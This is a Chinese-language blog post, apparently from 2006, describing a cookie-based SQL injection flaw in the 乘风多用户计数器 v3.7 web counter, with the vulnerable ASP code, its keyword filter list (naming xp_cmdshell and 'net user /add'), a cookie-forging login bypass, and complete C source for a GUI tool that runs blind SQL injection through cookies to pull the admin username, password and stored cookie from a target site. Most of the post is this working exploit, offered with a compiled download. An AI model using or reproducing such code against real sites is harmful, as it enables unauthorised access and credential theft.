0
Cookies注入漏洞, 是别人研究已久的东西,我最近在查一些代码,不小心翻出一个来了.
乘风多用户计数器v3.7其中存在多处的Cookies注入漏洞
其中注册文件QQCF_REG.asp中有一段
If request("action")="checkuser" Then
User_Name=Request("User_Name")
------------------------------------------------------中间略过一段
Set Rs= Server.CreateObject("ADODB.Recordset")
Sql="Select Count(*) From WWW_QQCF_COM_CfCount_RegUser Where User_Name='"&User_Name&"'"
嘿嘿,没有经过任何处理,试着注入不行,
再看顶上
引用了通用注入程序,看代码
'dim sql_injdata
SQL_injdata = "'|and|exec|insert|delete|update|chr|mid|from|"&_
"truncate|char|declare|object|script|applet|execute|join|"&_
"union|where|like|drop|create|rename|truncate|alter|nchar|alter|"&_
"cast|exists|xp_cmdshell"
'SQL_injdata = "'|""|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|xp_cmdshell|net user|/add|exec%20master.dbo.xp_cmdshell|net localgroup administrators|count|:|drop|from|--|(|)|chr"
SQL_inj = split(SQL_Injdata,"|")
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Lcase(Request.QueryString(SQL_Get)),Sql_Inj(Sql_DATA))>0 Then
Response.Write "参数中包含非法字符"&Sql_Inj(Sql_DATA)
Response.End
End If
Next
Next
End If
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Lcase(Request.Form(Sql_Post)),Sql_Inj(Sql_DATA))>0 Then
Response.Write "参数中包含非法字符"&Sql_Inj(Sql_DATA)
Response.end
End If
Next
Next
End If
发现啥了没有,根本没对Request.Cookies做处理,所以可以利用cookies进行注入
再来看登陆页面
If Session("CfCountAdmin")="" Then
If Request.Cookies("CfCountAdminCooKie")<>"" then
CfCountAdminCooKie=Chkstr(Request.Cookies("CfCountAdminCooKie"))
If RsSet("Cookies")=CfCountAdminCooKie Then Session("CfCountAdmin")="ok"
End If
End If
嘿嘿,当保存过cookies之后,他会把cookies存到数据库中,这样不需要暴md5密码了.
直接修改cookies ,就可以骗过登陆了.
程序利用代码,我并不希望你能看懂他,嘿嘿,因为我的确写得很混乱.
但是里面全是一些原创的代码,或许可以看看.
网上流传的那些cookies浏览器,没啥好神秘的,两个api就搞定了.
这里我没用socket,而是使用了WININET,更没有使用多线程,我觉得没啥必要.
/*----------------------------------------------
* 文件: sql.cpp
* 作者: 坏坏
* 说明: 用于cookies注入一个计数系统
* 日期: 2006.2.18
* 联系方式: [url]Http://hhuai.cn[/url]
*---------------------------------------------*/
#include
#include
#include
#include
#include "resource.h"
using namespace std;
#pragma comment(lib,"wininet.lib")
HWND hwnddialog;
char user_name[1000]={'\0'};
char admin[50]={'\0'};
char password[17]={'\0'};
char Cookies[30]={'\0'};
void SetText(char *s)
{
HWND hwnd=GetDlgItem(hwnddialog,IDC_LIST1);
SendMessage(hwnd,LB_ADDSTRING,0,(LPARAM)(LPCTSTR)s);
}
char * OpenUrl(char *szURL)
{
HINTERNET hInternet=InternetOpen("Huai_Huai",INTERNET_OPEN_TYPE_PRECONFIG,
NULL,NULL,0);
HINTERNET hInternetFile=InternetOpenUrl(hInternet,szURL,NULL,0,
INTERNET_FLAG_DONT_CACHE | INTERNET_FLAG_RELOAD | INTERNET_FLAG_TRANSFER_BINARY,0);
DWORD dwOut=0;
char lpBuffer[1024]={0};
if(InternetReadFile(hInternetFile,lpBuffer,1024,&dwOut))
//SetText(lpBuffer);
InternetCloseHandle(hInternet);
return lpBuffer;
}
void SetCookie(char *szURL)
{
char cookie[1000]={'\0'};
sprintf(cookie,"user_name=%s",user_name);
InternetSetCookie(szURL,NULL,cookie);
}
void ToHex()
{
char zz[1000]={'\0'};
char z[4]={'\0'};
for(int i=0;i {
strcat(zz,"%");
sprintf(z,"%x",user_name[i]);
strcat(zz,z);
}
strcpy(user_name,zz);
}
DWORD WINAPI CrackUserName(
LPVOID lpParameter // thread data
)
{
char szURL[256];
int dic[8]={128,64,32,16,8,4,2,1};
int num=0;
int q=1;
GetWindowText(GetDlgItem(hwnddialog,IDC_EDIT1),szURL,256);
int j=(int)lpParameter;
for(int k=0;k<8;k++)
{
num+=q*dic[k];
ZeroMemory(user_name,1000);
sprintf(user_name,"huaihuai_caixiaoyao' or (select top 1 asc(mid(admin,%d,1)) from WWW_QQCF_COM_CfCount_Admin)<%d and '1",j,num);
ToHex();
SetCookie(szURL);
char *lpszData=OpenUrl(szURL);
if(strstr(lpszData,"此用户名已经被别人注册了"))
{
q=1;
if(k==7)
num++;
}
else
{
q=-1;
}
}
char lpText1[50]={'\0'};
sprintf(lpText1,"用户名第%d位为:%c",j,k);
SetText(lpText1);
sprintf(&admin[j-1],"%c",k);
return 0;
}
DWORD WINAPI SqlIn(
LPVOID lpParameter // thread data
)
{
char szURL[256];
//char lpszData[256]={'\0'};
DWORD dwSize=0;
DWORD ThreadId;
int dic[8]={128,64,32,16,8,4,2,1};
int num=0;
int q=1;
GetWindowText(GetDlgItem(hwnddialog,IDC_EDIT1),szURL,256);
//
strcpy(user_name,"huaihuai_caixiaoyao' or 1=1 and '1");
ToHex();
SetCookie(szURL);
char *lpszData=OpenUrl(szURL);
if(strstr(lpszData,"此用户名已经被别人注册了"))
SetText("此网站存在cookies注入漏洞");
else
{
SetText("不存在注入漏洞,请换个网站再试。");
return 0;
}
//xiao2004' or (select len(username) from WWW_QQCF_COM_CfCount_Admin)<20 and '1
strcat(admin,"用户名:");
strcat(password,"密码:");
for(int i=0;i<8;i++)
{
num+=q*dic[i];
ZeroMemory(user_name,1000);
sprintf(user_name,"huaihuai_caixiaoyao' or (select top 1 len(cookies) from WWW_QQCF_COM_CfCount_Admin)>%d and '1",num);
ToHex();
SetCookie(szURL);
lpszData=OpenUrl(szURL);
if(strstr(lpszData,"此用户名已经被别人注册了"))
{
q=1;
if(i==7) num++;
}
else
{
q=-1;
}
}
char lpText2[50]={'\0'};
sprintf(lpText2,"Cookies位数:%d",num);
SetText(lpText2);
i=num;
num=0;
q=1;
if(i==1)
{
SetText("Cookies不存在");
}
else
{
for(int j=1;j<=i;j++)
{
// CreateThread(NULL,0,CrackUserName,(LPVOID)&j,0,&ThreadId);
for(int k=0;k<8;k++)
{
num+=q*dic[k];
ZeroMemory(user_name,1000);
sprintf(user_name,"huaihuai_caixiaoyao' or (select top 1 asc(mid(cookies,%d,1)) from WWW_QQCF_COM_CfCount_Admin)>%d and '1",j,num);
ToHex();
SetCookie(szURL);
lpszData=OpenUrl(szURL);
if(strstr(lpszData,"此用户名已经被别人注册了"))
{
q=1;
if (k==7) num++;
}
else
{
q=-1;
}
}
char lpText1[50]={'\0'};
// sprintf(lpText1,"Cookies第%d位为:%c",j,num);
// SetText(lpText1);
sprintf(&Cookies[j-1],"%c",num);
}
}
num=0;
q=1;
for(i=0;i<8;i++)
{
num+=q*dic[i];
ZeroMemory(user_name,1000);
sprintf(user_name,"huaihuai_caixiaoyao' or (select top 1 len(admin) from WWW_QQCF_COM_CfCount_Admin)>%d and '1",num);
ToHex();
SetCookie(szURL);
lpszData=OpenUrl(szURL);
if(strstr(lpszData,"此用户名已经被别人注册了"))
{
q=1;
if(i==7) num++;
}
else
q=-1;
}
char lpText1[50]={'\0'};
sprintf(lpText1,"用户名位数:%d",num);
SetText(lpText1);
if(num==30)
{
SetText("探测用户位数出错,程序停止探测!");
return 0;
}
else
{
q=1;
for(int j=1;j<=i;j++)
{
i=num;
num=0;
// CreateThread(NULL,0,CrackUserName,(LPVOID)&j,0,&ThreadId);
for(int k=0;k<8;k++)
{
num+=q*dic[k];
ZeroMemory(user_name,1000);
sprintf(user_name,"huaihuai_caixiaoyao' or (select top 1 asc(mid(admin,%d,1)) from WWW_QQCF_COM_CfCount_Admin)>%d and '1",j,num);
ToHex();
SetCookie(szURL);
lpszData=OpenUrl(szURL);
if(strstr(lpszData,"此用户名已经被别人注册了"))
{
q=1;
if(k==7) num++;
}
else q=-1;
}
char lpText1[50]={'\0'};
// sprintf(lpText1,"用户名第%d位为:%c",j,num);
// SetText(lpText1);
sprintf(&admin[j-1],"%c",num);
}
}
i=16;
ZeroMemory(user_name,1000);
sprintf(user_name,"huaihuai_caixiaoyao' or (select top 1 len(password) from WWW_QQCF_COM_CfCount_Admin)=%d and '1",i);
ToHex();
SetCookie(szURL);
lpszData=OpenUrl(szURL);
if(strstr(lpszData,"此用户名已经被别人注册了"))
{
char lpText1[50]={'\0'};
sprintf(lpText1,"密码位数:%d",i);
SetText(lpText1);
for(int j=1;j<=i;j++)
{
num=0;
q=1;
for(int k=0;k<8;k++)
{
num+=q*dic[k];
ZeroMemory(user_name,1000);
sprintf(user_name,"huaihuai_caixiaoyao' or (select top 1 asc(mid(password,%d,1)) from WWW_QQCF_COM_CfCount_Admin)>%d and '1",j,num);
ToHex();
SetCookie(szURL);
lpszData=OpenUrl(szURL);
if(strstr(lpszData,"此用户名已经被别人注册了"))
{
q=1;
if(k==7) num++;
}
else
q=-1;
}
char lpText1[50]={'\0'};
// sprintf(lpText1,"密码第%d位为:%c",j,num);
// SetText(lpText1);
sprintf(&password[j-1],"%c",num);
}
}
SetText(TEXT("用户名:"));
SetText(admin);
SetText("密码:");
SetText(password);
SetText("Cookies:");
SetText(Cookies);
//SetWindowText(GetDlgItem(hwnddialog,IDC_EDIT2),ToHex());
return 0;
}
BOOL CALLBACK DialogProc(
HWND hwndDlg, // handle to dialog box
UINT uMsg, // message
WPARAM wParam, // first message parameter
LPARAM lParam // second message parameter
)
{
DWORD ThreadId;
hwnddialog=hwndDlg;
switch(uMsg)
{
case WM_INITDIALOG:
SetWindowText(GetDlgItem(hwndDlg,IDC_EDIT1),"[url]http://localhost/cfcount37/QQCF_Reg.Asp?action=checkuser[/url]");
break;
case WM_CLOSE:
EndDialog(hwndDlg,0);
break;
case WM_COMMAND:
if(LOWORD(wParam)==IDC_BUTTON2)
CreateThread(NULL,0,SqlIn,NULL,0,&ThreadId);
break;
}
return FALSE;
}
int WINAPI WinMain(
HINSTANCE hInstance, // handle to current instance
HINSTANCE hPrevInstance, // handle to previous instance
LPSTR lpCmdLine, // pointer to command line
int nCmdShow // show state of window
)
{
DialogBox(hInstance,MAKEINTRESOURCE(IDD_DIALOG1),NULL,DialogProc);
return 1;
}
当然也可以下载我编译好的源程序:
C写的东东比较小,但引用了Wininet 这个库,使得程序大了不少, 29K
[1] [2] 下一页 |
用户登录 
新用户注册
文章评论(评论内容只代表网友观点,与本站立场无关!) 【发表评论】
苏ICP备05042773号